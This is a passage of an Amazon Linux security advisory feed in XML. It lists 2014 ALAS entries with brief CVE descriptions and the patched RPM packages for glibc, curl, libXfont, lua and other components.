arch="i686"><filename>Packages/exim-mon-4.72-6.6.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.72" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.72-6.6.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.72" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.72-6.6.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.72" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.72-6.6.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.72" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.72-6.6.amzn1.i686.rpm</filename></package><package name="exim" version="4.72" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.72-6.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-396</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-396: important priority package update for 389-ds-base</title><issued date="2014-08-21 11:20:00" /><updated date="2014-09-19 11:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3562:
It was found that when replication was enabled for each attribute in Red Hat Directory Server / 389 Directory Server, which is the default configuration, the server returned replicated metadata when the directory was searched while debugging was enabled. A remote attacker could use this flaw to disclose potentially sensitive information.
1123477:
CVE-2014-3562 389-ds: unauthenticated information disclosure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3562" title="" id="CVE-2014-3562" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-libs" version="1.3.2.22" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.2.22-1.18.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.2.22" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.2.22-1.18.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.2.22" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.2.22-1.18.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.2.22" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.2.22-1.18.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.2.22" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.2.22-1.18.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.2.22" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.2.22-1.18.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.2.22" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.2.22-1.18.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.2.22" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.2.22-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-397</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-397: medium priority package update for libserf</title><issued date="2014-09-03 14:37:00" /><updated date="2014-09-19 11:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3504:
The (1) serf_ssl_cert_issuer, (2) serf_ssl_cert_subject, and (3) serf_ssl_cert_certificate functions in Serf 0.2.0 through 1.3.x before 1.3.7 does not properly handle a NUL byte in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority.
1128962:
CVE-2014-3504 libserf: failure to properly handle a NUL character in the CommonName or SubjectAltNames fields
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3504" title="" id="CVE-2014-3504" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libserf" version="1.3.7" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libserf-1.3.7-1.6.amzn1.x86_64.rpm</filename></package><package name="libserf-devel" version="1.3.7" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libserf-devel-1.3.7-1.6.amzn1.x86_64.rpm</filename></package><package name="libserf-debuginfo" version="1.3.7" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libserf-debuginfo-1.3.7-1.6.amzn1.x86_64.rpm</filename></package><package name="libserf-debuginfo" version="1.3.7" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/libserf-debuginfo-1.3.7-1.6.amzn1.i686.rpm</filename></package><package name="libserf-devel" version="1.3.7" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/libserf-devel-1.3.7-1.6.amzn1.i686.rpm</filename></package><package name="libserf" version="1.3.7" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/libserf-1.3.7-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-398</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-398: medium priority package update for file</title><issued date="2014-09-03 14:38:00" /><updated date="2014-09-19 11:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3587:
Integer overflow in the cdf_read_property_info function in cdf.c in file through 5.19, as used in the Fileinfo component in PHP before 5.4.32 and 5.5.x before 5.5.16, allows remote attackers to cause a denial of service (application crash) via a crafted CDF file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1571.
1128587:
CVE-2014-3587 file: incomplete fix for CVE-2012-1571 in cdf_read_property_info
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3587" title="" id="CVE-2014-3587" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="file-devel" version="5.19" release="4.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.19-4.19.amzn1.x86_64.rpm</filename></package><package name="file" version="5.19" release="4.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.19-4.19.amzn1.x86_64.rpm</filename></package><package name="python-magic" version="5.19" release="4.19.amzn1" epoch="0" arch="noarch"><filename>Packages/python-magic-5.19-4.19.amzn1.noarch.rpm</filename></package><package name="file-static" version="5.19" release="4.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.19-4.19.amzn1.x86_64.rpm</filename></package><package name="file-libs" version="5.19" release="4.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.19-4.19.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.19" release="4.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.19-4.19.amzn1.x86_64.rpm</filename></package><package name="file-devel" version="5.19" release="4.19.amzn1" epoch="0" arch="i686"><filename>Packages/file-devel-5.19-4.19.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.19" release="4.19.amzn1" epoch="0" arch="i686"><filename>Packages/file-libs-5.19-4.19.amzn1.i686.rpm</filename></package><package name="file-static" version="5.19" release="4.19.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.19-4.19.amzn1.i686.rpm</filename></package><package name="file-debuginfo" version="5.19" release="4.19.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.19-4.19.amzn1.i686.rpm</filename></package><package name="file" version="5.19" release="4.19.amzn1" epoch="0" arch="i686"><filename>Packages/file-5.19-4.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-399</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-399: important priority package update for glibc</title><issued date="2014-09-03 14:44:00" /><updated date="2014-09-19 11:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-5119:
An off-by-one heap-based buffer overflow flaw was found in glibc's internal __gconv_translit_find() function. An attacker able to make an application call the iconv_open() function with a specially crafted argument could possibly use this flaw to execute arbitrary code with the privileges of that application.
1119128:
CVE-2014-5119 glibc: off-by-one error leading to a heap-based buffer overflow flaw in __gconv_translit_find()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5119" title="" id="CVE-2014-5119" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-debuginfo" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.85.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-55.85.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-55.85.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-55.85.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-55.85.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-55.85.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-55.85.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-55.85.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-55.85.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-55.85.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.85.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-55.85.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-400</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-400: medium priority package update for glibc</title><issued date="2014-09-17 21:41:00" /><updated date="2014-09-19 11:58:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0475:
A directory traveral flaw was found in the way glibc loaded locale files. An attacker able to make an application use a specially crafted locale name value (for example, specified in an LC_* environment variable) could possibly use this flaw to execute arbitrary code with the privileges of that application.
1102353:
CVE-2014-0475 glibc: directory traversal in LC_* locale handling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0475" title="" id="CVE-2014-0475" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-common" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-55.86.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-55.86.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-55.86.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-55.86.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-55.86.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-55.86.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-55.86.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-55.86.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-55.86.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.86.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-55.86.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-401</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-401: low priority package update for automake19</title><issued date="2014-09-17 21:41:00" /><updated date="2014-09-19 12:01:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-3386:
The "make distcheck" rule in GNU Automake before 1.11.6 and 1.12.x before 1.12.2 grants world-writable permissions to the extraction directory, which introduces a race condition that allows local users to execute arbitrary code via unspecified vectors.
It was found that the distcheck rule in Automake-generated Makefiles made a directory world-writable when preparing source archives. If a malicious, local user could access this directory, they could execute arbitrary code with the privileges of the user running "make distcheck".
838286:
CVE-2012-3386 automake: locally exploitable "make distcheck" bug
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3386" title="" id="CVE-2012-3386" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="automake19" version="1.9.6" release="3.12.amzn1" epoch="0" arch="noarch"><filename>Packages/automake19-1.9.6-3.12.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-402</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-402: medium priority package update for lua</title><issued date="2014-09-17 21:44:00" /><updated date="2014-09-19 12:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-5461:
Buffer overflow in the vararg functions in ldo.c in Lua 5.1 through 5.2.x before 5.2.3 allows context-dependent attackers to cause a denial of service (crash) via a small number of arguments to a function with a large number of fixed arguments.
1132304:
CVE-2014-5461 lua: overflow flaw in vararg functions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5461" title="" id="CVE-2014-5461" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lua-devel" version="5.1.4" release="4.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lua-devel-5.1.4-4.1.9.amzn1.x86_64.rpm</filename></package><package name="lua-debuginfo" version="5.1.4" release="4.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lua-debuginfo-5.1.4-4.1.9.amzn1.x86_64.rpm</filename></package><package name="lua-static" version="5.1.4" release="4.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lua-static-5.1.4-4.1.9.amzn1.x86_64.rpm</filename></package><package name="lua" version="5.1.4" release="4.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/lua-5.1.4-4.1.9.amzn1.x86_64.rpm</filename></package><package name="lua" version="5.1.4" release="4.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lua-5.1.4-4.1.9.amzn1.i686.rpm</filename></package><package name="lua-devel" version="5.1.4" release="4.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lua-devel-5.1.4-4.1.9.amzn1.i686.rpm</filename></package><package name="lua-debuginfo" version="5.1.4" release="4.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lua-debuginfo-5.1.4-4.1.9.amzn1.i686.rpm</filename></package><package name="lua-static" version="5.1.4" release="4.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/lua-static-5.1.4-4.1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-403</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-403: medium priority package update for libXext</title><issued date="2014-09-17 21:44:00" /><updated date="2014-09-19 12:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1982:
Multiple integer overflows in X.org libXext 1.3.1 and earlier allow X servers to trigger allocation of insufficient memory and a buffer overflow via vectors related to the (1) XcupGetReservedColormapEntries, (2) XcupStoreColors, (3) XdbeGetVisualInfo, (4) XeviGetVisualInfo, (5) XShapeGetRectangles, and (6) XSyncListSystemCounters functions.
959046:
CVE-2013-1982 libXext: Multiple integer overflows leading to heap-based buffer-overflows
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1982" title="" id="CVE-2013-1982" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXext-debuginfo" version="1.3.1" release="2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXext-debuginfo-1.3.1-2.9.amzn1.x86_64.rpm</filename></package><package name="libXext-devel" version="1.3.1" release="2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXext-devel-1.3.1-2.9.amzn1.x86_64.rpm</filename></package><package name="libXext" version="1.3.1" release="2.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXext-1.3.1-2.9.amzn1.x86_64.rpm</filename></package><package name="libXext-debuginfo" version="1.3.1" release="2.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXext-debuginfo-1.3.1-2.9.amzn1.i686.rpm</filename></package><package name="libXext-devel" version="1.3.1" release="2.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXext-devel-1.3.1-2.9.amzn1.i686.rpm</filename></package><package name="libXext" version="1.3.1" release="2.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXext-1.3.1-2.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-404</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-404: medium priority package update for libXfont</title><issued date="2014-09-17 21:44:00" /><updated date="2014-09-19 12:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0211:
Multiple integer overflows in the (1) fs_get_reply, (2) fs_alloc_glyphs, and (3) fs_read_extent_info functions in X.Org libXfont before 1.4.8 and 1.4.9x before 1.4.99.901 allow remote font servers to execute arbitrary code via a crafted xfs reply, which triggers a buffer overflow.
1096601:
CVE-2014-0211 libXfont: integer overflows calculating memory needs for xfs replies
CVE-2014-0210:
Multiple buffer overflows in X.Org libXfont before 1.4.8 and 1.4.9x before 1.4.99.901 allow remote font servers to execute arbitrary code via a crafted xfs protocol reply to the (1) _fs_recv_conn_setup, (2) fs_read_open_font, (3) fs_read_query_info, (4) fs_read_extent_info, (5) fs_read_glyphs, (6) fs_read_list, or (7) fs_read_list_info function.
1096597:
CVE-2014-0210 libXfont: unvalidated length fields when parsing xfs protocol replies
CVE-2014-0209:
Multiple integer overflows in the (1) FontFileAddEntry and (2) lexAlias functions in X.Org libXfont before 1.4.8 and 1.4.9x before 1.4.99.901 might allow local users to gain privileges by adding a directory with a large fonts.dir or fonts.alias file to the font path, which triggers a heap-based buffer overflow, related to metadata.
1096593:
CVE-2014-0209 libXfont: integer overflow of allocations in font metadata file parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0209" title="" id="CVE-2014-0209" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0210" title="" id="CVE-2014-0210" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0211" title="" id="CVE-2014-0211" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXfont" version="1.4.5" release="3.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-1.4.5-3.9.amzn1.x86_64.rpm</filename></package><package name="libXfont-debuginfo" version="1.4.5" release="3.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-debuginfo-1.4.5-3.9.amzn1.x86_64.rpm</filename></package><package name="libXfont-devel" version="1.4.5" release="3.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfont-devel-1.4.5-3.9.amzn1.x86_64.rpm</filename></package><package name="libXfont" version="1.4.5" release="3.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-1.4.5-3.9.amzn1.i686.rpm</filename></package><package name="libXfont-devel" version="1.4.5" release="3.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-devel-1.4.5-3.9.amzn1.i686.rpm</filename></package><package name="libXfont-debuginfo" version="1.4.5" release="3.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXfont-debuginfo-1.4.5-3.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-405</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-405: medium priority package update for libxcb</title><issued date="2014-09-17 21:45:00" /><updated date="2014-09-19 12:04:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2064:
Integer overflow in X.org libxcb 1.9 and earlier allows X servers to trigger allocation of insufficient memory and a buffer overflow via vectors related to the read_packet function.
960367:
CVE-2013-2064 libxcb: Integer overflow leading to heap-based buffer overlow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2064" title="" id="CVE-2013-2064" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxcb" version="1.8.1" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxcb-1.8.1-1.15.amzn1.x86_64.rpm</filename></package><package name="libxcb-devel" version="1.8.1" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxcb-devel-1.8.1-1.15.amzn1.x86_64.rpm</filename></package><package name="libxcb-doc" version="1.8.1" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/libxcb-doc-1.8.1-1.15.amzn1.noarch.rpm</filename></package><package name="libxcb-debuginfo" version="1.8.1" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxcb-debuginfo-1.8.1-1.15.amzn1.x86_64.rpm</filename></package><package name="libxcb-python" version="1.8.1" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxcb-python-1.8.1-1.15.amzn1.x86_64.rpm</filename></package><package name="libxcb-debuginfo" version="1.8.1" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxcb-debuginfo-1.8.1-1.15.amzn1.i686.rpm</filename></package><package name="libxcb-devel" version="1.8.1" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxcb-devel-1.8.1-1.15.amzn1.i686.rpm</filename></package><package name="libxcb-python" version="1.8.1" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxcb-python-1.8.1-1.15.amzn1.i686.rpm</filename></package><package name="libxcb" version="1.8.1" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/libxcb-1.8.1-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-406</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-406: medium priority package update for libXtst</title><issued date="2014-09-17 21:45:00" /><updated date="2014-09-19 12:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2063:
Integer overflow in X.org libXtst 1.2.1 and earlier allows X servers to trigger allocation of insufficient memory and a buffer overflow via vectors related to the XRecordGetContext function.
960366:
CVE-2013-2063 libXtst:Integer overflow leading to heap-based buffer overlow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2063" title="" id="CVE-2013-2063" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXtst" version="1.2.1" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXtst-1.2.1-2.8.amzn1.x86_64.rpm</filename></package><package name="libXtst-debuginfo" version="1.2.1" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXtst-debuginfo-1.2.1-2.8.amzn1.x86_64.rpm</filename></package><package name="libXtst-devel" version="1.2.1" release="2.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXtst-devel-1.2.1-2.8.amzn1.x86_64.rpm</filename></package><package name="libXtst-debuginfo" version="1.2.1" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXtst-debuginfo-1.2.1-2.8.amzn1.i686.rpm</filename></package><package name="libXtst" version="1.2.1" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXtst-1.2.1-2.8.amzn1.i686.rpm</filename></package><package name="libXtst-devel" version="1.2.1" release="2.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXtst-devel-1.2.1-2.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-407</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-407: medium priority package update for curl</title><issued date="2014-09-17 21:45:00" /><updated date="2014-09-19 12:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3620:
1138846:
CVE-2014-3620 curl: cookies accepted for TLDs
CVE-2014-3613:
1136154:
CVE-2014-3613 curl: incorrect handling of IP addresses in cookie domain
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3613" title="" id="CVE-2014-3613" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3620" title="" id="CVE-2014-3620" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl-devel" version="7.38.0" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.38.0-1.46.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.38.0" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.38.0-1.46.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.38.0" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.38.0-1.46.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.38.0" release="1.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.38.0-1.46.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.38.0" release="1.46.amzn1" epoch="0" 